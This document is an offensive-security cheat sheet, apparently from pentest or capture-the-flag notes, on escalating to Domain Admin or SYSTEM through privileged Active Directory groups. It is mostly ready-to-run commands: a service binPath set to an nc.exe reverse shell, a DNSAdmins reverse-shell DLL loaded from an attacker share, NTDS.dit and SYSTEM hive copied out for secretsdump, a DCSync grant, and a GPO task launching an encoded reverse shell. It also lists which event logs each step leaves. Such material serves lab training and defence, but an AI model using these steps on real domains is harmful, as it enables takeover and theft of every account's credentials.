Group Membership Abuse
#Overview
Active Directory comes with numerous built-in privileged groups that grant specific elevated capabilities beyond standard domain user rights. A user who is a member of one of these groups — whether through ACL abuse, credential compromise, or misconfiguration — can often escalate directly to Domain Admin or SYSTEM. Understanding each group's specific privileges and exploitation techniques is essential, as the attack path varies significantly between groups.
#Prerequisites
- Membership in one of the privileged groups described below
- Knowledge of the group's specific capabilities
- Appropriate tools for the exploitation path (varies per group)
#Account Operators
Capabilities: Can create, modify, and delete users and groups. Cannot modify protected groups (Domain Admins, Enterprise Admins, etc.) or protected accounts.
# Create a new user
net user john abc123! /add /domain
# Add to non-protected privileged groups
net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add
# Real chain from Forest HTB:
# svc-alfresco -> Account Operators -> create john -> add to Exchange Windows Permissions
# -> Exchange Windows Permissions has WriteDACL on domain -> grant DCSync -> secretsdump
BASH
#Backup Operators
Capabilities: SeBackupPrivilege and SeRestorePrivilege. Can read any file on the system including NTDS.dit, SAM, and SYSTEM registry hives.
Method A: Direct NTDS.dit dump via wbadmin
# From Blackfield HTB:
# 1. Set up Samba share on attacker machine
# In /etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
interfaces = tun0
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
# 2. Create Samba user and start service
adduser smbuser && smbpasswd -a smbuser && service smbd restart
# 3. Mount share from WinRM and backup NTDS
net use k: \\10.10.14.3\smb /user:smbuser smbpass
echo "Y" | wbadmin start backup -backuptarget:\\10.10.14.3\smb -include:c:\windows\ntds
# 4. Get backup version and restore NTDS.dit to local filesystem
wbadmin get versions
echo "Y" | wbadmin start recovery -version:<VERSION_ID> -itemtype:file \
-items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
# 5. Export SYSTEM hive
reg save HKLM\SYSTEM C:\system.hive
# 6. Transfer files and extract all hashes
cp ntds.dit \\10.10.14.3\smb\NTDS.dit && cp system.hive \\10.10.14.3\smb\system.hive
secretsdump.py -ntds NTDS.dit -system system.hive LOCAL
BASH
Method B: Shadow Copy via diskshadow
# Create diskshadow script
echo "set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit" > cmd
# Execute diskshadow
diskshadow /s cmd
# Creates a shadow volume accessible via H: drive
# Copy NTDS.dit using SeBackupPrivilege (requires SeBackupPrivilegeUtils)
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SAM c:\windows\temp\SAM -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY c:\windows\temp\SECURITY -Overwrite
# Extract hashes locally
secretsdump.py -ntds ntds -system system LOCAL
# For member servers (no NTDS.dit): -sam sam -security security -system system LOCAL
BASH
Method C: robocopy with /b flag
# Read files with backup privilege bypassing ACLs
robocopy /b C:\Users\Administrator\Desktop\ C:\
# Note: May be blocked by EFS encryption
BASH
#Server Operators
Capabilities: Can start, stop, and configure system services. Can log on to DCs interactively. Can modify service binary paths.
# From Return HTB:
# 1. Upload netcat binary
upload /usr/share/windows-resources/binaries/nc.exe
# 2. Modify service binary path to run reverse shell
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.2 1234"
# 3. Stop and start the service to trigger shell
sc.exe stop vss
sc.exe start vss
# Note: vss (Volume Shadow Copy) runs as SYSTEM
# 4. Alternative: use msfvenom shell for meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
upload shell.exe
sc.exe config vss binPath="C:\Users\svc-printer\Desktop\shell.exe"
sc.exe start vss
# Then migrate meterpreter to a stable SYSTEM process
BASH
#DNSAdmins
Capabilities: Can manage DNS server configuration. Can inject an arbitrary DLL into the DNS service by configuring the ServerLevelPluginDll registry value. The DNS service runs as SYSTEM.
# Generate malicious DLL (e.g., with msfvenom)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > evil.dll
# Host DLL on SMB share and configure DNS to load it
dnscmd <DC> /config /serverlevelplugindll \\<attacker_ip>\share\evil.dll
# Stop and start DNS service to trigger DLL load
sc.exe stop dns && sc.exe start dns
# Alternative: use the registry directly
reg add "HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /t REG_SZ /d "\\<attacker_ip>\share\evil.dll"
sc.exe stop dns && sc.exe start dns
BASH
#Print Operators
Capabilities: SeLoadDriverPrivilege. Can load kernel drivers. Can log on to DCs interactively.
# Abuse SeLoadDriverPrivilege to load a malicious driver
# Requires a vulnerable signed driver (BYOVD — Bring Your Own Vulnerable Driver)
# Common target: Capcom.sys or RTCore64.sys
# Use EoPLoadDriver or similar tool to load the vulnerable driver
# Then exploit the loaded driver to execute code in kernel context -> SYSTEM
BASH
#Exchange Windows Permissions
Capabilities: WriteDACL on the domain object. This allows granting any right (including DCSync) to any principal.
# From Forest HTB (via Account Operators -> added to Exchange Windows Permissions):
# 1. Add user to Exchange Windows Permissions group
net group "Exchange Windows Permissions" john /add
# 2. Grant DCSync to the controlled user
. .\PowerView.ps1
$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\john', $pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
# 3. DCSync
impacket-secretsdump htb/john@10.10.10.161
BASH
#Exchange Trusted Subsystem
Capabilities: Member of Exchange Windows Permissions group. Same exploitation path.
# The Trusted Subsystem inherits the WriteDACL on domain capability
# Follow the same chain as Exchange Windows Permissions
BASH
#Remote Desktop Users
Capabilities: RDP access to servers where the group is assigned.
# RDP login with compromised credentials
xfreerdp /v:<target> /u:<user> /p:<pass>
# Useful for graphical enumeration and running tools that require GUI context
BASH
#Distributed COM Users
Capabilities: Can execute DCOM objects remotely. DCOM execution can lead to lateral movement.
# DCOM lateral movement using MMC20.Application or ShellWindows
# Allows remote command execution on target machines
BASH
#Group Policy Creator Owners
Capabilities: Can create and modify Group Policy Objects (GPOs). GPOs linked to Domain Controllers OU can execute code as SYSTEM on the DC.
# From TheFrizz HTB:
# 1. Create malicious GPO linked to Domain Controllers OU
New-GPO -Name privesc | New-GPLink \
-Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
# 2. Add scheduled task running reverse shell
.\SharpGPOAbuse.exe --addcomputertask --gponame "privesc" --author TCG \
--taskname PrivEsc --command "powershell.exe" \
--arguments "powershell -e <BASE64_REV_SHELL>"
# 3. Force GPO update (or wait for refresh cycle)
gpupdate /force
POWERSHELL
#Common Pitfalls
- Protected groups: Account Operators cannot modify Domain Admins or other adminSDHolder-protected groups
- EFS encryption: robocopy with SeBackupPrivilege cannot read EFS-encrypted files. Dump system hive and decrypt.
- Service crash: Modifying the VSS service may crash it. Choose a non-critical service or restore the binary path.
- DNSAdmins DLL path: The DLL must be accessible via UNC path from the DC. Use an SMB share with appropriate permissions.
- wbadmin versioning: Specify the exact backup version identifier when restoring
#OPSEC Considerations
- Service binary path modifications are logged in the System event log (Service Control Manager)
- Adding members to privileged groups generates Event IDs 4728/4732/4756
- NTDS.dit access via Backup Operators generates file access audits
- GPO creation and modification is logged as Directory Service changes
- Loading DLLs via DNS triggers Sysmon Event ID 7 (Image Loaded)
- Shadow copy creation (vssadmin/diskshadow) is logged and commonly monitored
- DCSync generates Event ID 4662 (directory service access)
#Post-Exploitation Value
- Many group privilege paths lead directly to Domain Admin (Exchange Windows Permissions + DCSync)
- Server Operators and Backup Operators provide SYSTEM access on the DC
- DNSAdmins provides SYSTEM on the DNS server (often the DC)
- Group Policy Creator Owners provides system-wide code execution via GPO deployment
- These paths typically bypass credential-based monitoring since they abuse privileges rather than compromised credentials
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| SharpGPOAbuse | https://github.com/byronkg/SharpGPOAbuse |
| SeBackupPrivilegeUtils | https://github.com/giuliano108/SeBackupPrivilege |
| PowerView | https://github.com/PowerShellMafia/PowerSploit |
| secretsdump (Impacket) | https://github.com/fortra/impacket |
#Source Machines
- Forest (Easy) — Account Operators -> Exchange Windows Permissions -> WriteDACL -> DCSync
- Blackfield (Hard) — Backup Operators -> wbadmin backup NTDS -> secretsdump LOCAL -> Administrator hash
- Return (Easy) — Server Operators -> sc config vss binPath -> SYSTEM shell
- TheFrizz (Medium) — Group Policy Creator Owners -> New-GPO + SharpGPOAbuse -> SYSTEM
- Multimaster (Insane) — Server Operators -> sc config browser + SeBackupPrivilege for flag